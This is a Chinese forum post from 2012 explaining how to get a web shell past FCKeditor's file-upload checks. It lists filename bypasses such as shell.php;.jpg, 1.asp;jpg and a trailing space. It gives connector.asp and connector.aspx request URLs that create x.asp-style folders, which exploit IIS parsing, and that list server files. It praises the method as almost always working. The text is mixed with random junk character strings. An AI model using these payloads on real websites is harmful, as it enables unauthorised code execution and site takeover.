很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
4 a8 ]2 ^* u: i- h- E7 J# m# b4 a3 s% [
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
, J" E2 F0 c2 V! }2 X9 e
; r1 r3 O$ }4 B: v' y继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
' z' M9 u! V- k9 h5 v7 h8 p. _% j8 _4 J8 H
突破建立文件夹:. V9 Q- x9 s) j: T2 e
5 M9 D( D4 L, a* keditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
7 y# J7 x" ^( d/ f! V- T/ l
) }6 l1 d8 B( i$ ^$ `; T7 g参数:( X: V. ^$ @- Z3 W! ^& a
$ ^- M( _+ V5 q8 f6 u4 o6 H
当前目录名:CurrentFolder=/qing.asp
" U7 E$ t1 d4 u* F: ]/ S
: A- C9 s4 X2 r4 ]新的目录名:NewFolderName=x.asp2 U, Y- d0 E' T5 @
9 Q) n U: b5 b$ g0 \其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
( }4 E) c8 o% s" s7 c @) Y, v6 u4 G' G% m& J2 T+ l* f
那么 x.asp 就已经建立生成了,此方法百试百灵!( w5 I: o2 X0 k9 o7 ^8 J9 z
& L0 l' b6 ]2 A# y6 T7 d新建文件夹参数 x.asp,基本都能搞定。( @5 p/ B& a# [2 G1 j1 j8 l
z$ G: y/ F4 y/ F
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
$ A) W( q& h; r- c- Y' E) B& o, e3 a2 X6 F/ }
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
5 _0 e0 x5 ]" [% m O" }$ B/ M* K$ C `3 ^# }
获取文件列表 ~1 ]7 p5 B/ q( J' l: J
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
) c- N* P) s% n2 e& A5 d P' x* K1 E h; H
|
发表于 2012-12-31 09:27:09
收藏
支持
反对